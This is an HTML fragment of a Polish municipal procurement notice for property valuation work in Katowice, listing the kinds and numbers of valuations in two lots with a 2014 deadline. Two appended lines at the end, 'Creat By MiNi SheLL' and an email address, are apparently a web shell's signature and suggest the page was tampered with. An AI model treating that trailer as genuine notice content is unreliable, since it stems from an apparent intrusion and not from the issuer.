<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wycena nieruchomości lokalowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) wycena 310 lokali mieszkalnych,
b) wycena 30 lokali użytkowych,
c) wycena 70 lokali garażowych,
d) sporządzenie inwentaryzacji 22 lokali,
e) sporządzenie 235 rzutów kondygnacji z zaznaczonymi lokalami lub pomieszczeniami   przynależnymi,
f) sporządzenie 40 rzutów kondygnacji piwnic z zaznaczeniem wszystkich piwnic.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wycena nieruchomości gruntowych niezabudowanych i zabudowanych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Wycena nieruchomości gruntowej w celu nabywania, zbywania nieruchomości, regulacji stanów prawnych, zniesienia współwłasności, ustalenia opłat z tytułu użytkowania wieczystego w tym:
a) o powierzchni do        5000 m2                                                   -   200 nieruchomości,
b) o powierzchni powyżej 5000 m2                                                -       60 nieruchomości,
2. Wycena nieruchomości gruntowej niezabudowanej
    lub zabudowanej w celu jej sprzedaży na rzecz
    użytkownika wieczystego lub przekształcenia
    prawa użytkowania wieczystego w prawo własności                      -      110 nieruchomości,
3. Wycena udziałów w nieruchomości gruntowej w obrębie
    wspólnot mieszkaniowych i garażowych w celu przekształcenia
    prawa użytkowania wieczystego w prawo własności
    dla nieruchomości :
a) do 5 udziałów                                                                            -    10 udziałów,
b) każdy następny udział                                                              -      10 udziałów,
4. Wycena nieruchomości gruntowej w celu zbycia
    nieruchomości na poprawę warunków zagospodarowania                  -    22 nieruchomości,
5.Wycena nieruchomości gruntowej w celu ustalenia
    odszkodowania za grunty pod drogami publicznymi
    i innymi wywłaszczonymi nieruchomościami                                     -  77 nieruchomości,
6. Wycena nieruchomości w celu ustalenia odszkodowania
    za nieruchomości przeznaczone na realizację inwestycji
    drogowych:                                                                                  
    a) wycena nieruchomości gruntowej                                                -  110 nieruchomości,
    b) dodatkowe określenie wartości rynkowej składnika roślinnego        -   32 nieruchomości,
    c) dodatkowe określenie wartości rynkowej składnika budowlanego       - 25 nieruchomości,
7. Wycena nieruchomości gruntowych w celu ustalenia
    odszkodowania za zniszczony składnik roślinny spowodowany
    czasowym zajęciem nieruchomości w związku z prowadzoną
    inwestycją miejską                                                                       -   4 nieruchomości,
8. Wycena składnika roślinnego w celu ustalenia wysokości
    odszkodowania za drzewa i krzewy usuwane przez
    właściciela urządzeń przesyłowych z terenu Miasta Katowice               -  10 nieruchomości,
9.Wycena  nieruchomości zabudowanej domem
   jednorodzinnym                                                                           -  20 nieruchomości,
10. Wycena  nieruchomości zabudowanej budynkami
      mieszkalnymi wielorodzinnymi                                                      -   6 nieruchomości,
11. Wycena  nieruchomości zabudowanej budynkami
      przemysłowymi, handlowymi, usługowymi, gospodarczymi            -     20 nieruchomości,
12. Wycena  nieruchomości zabudowanej budynkami
      użyteczności publicznej                                                             -     7 nieruchomości,
13. Wycena nieruchomości zabudowanej budowlą                                 -   3 nieruchomości,
14. Inwentaryzacja budynków o łącznej powierzchni użytkowej:
      a) do 1500m2                                                                         -    12 inwentaryzacji,
      b) powyżej 1500m2                                                                      -  6 inwentaryzacji,
15. Wycena określająca wysokość jednorazowego
      wynagrodzenia za ustanowienie służebności przesyłu                      -  26 wycen,
16. Wycena określająca wysokość jednorazowego
      wynagrodzenia za ustanowienie służebności gruntowej
      polegającej na:
      - prawie przechodu i przejazdu                                                 -     35 wycen,
      - dostępie do urządzeń infrastruktury technicznej                         -     8 wycen..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com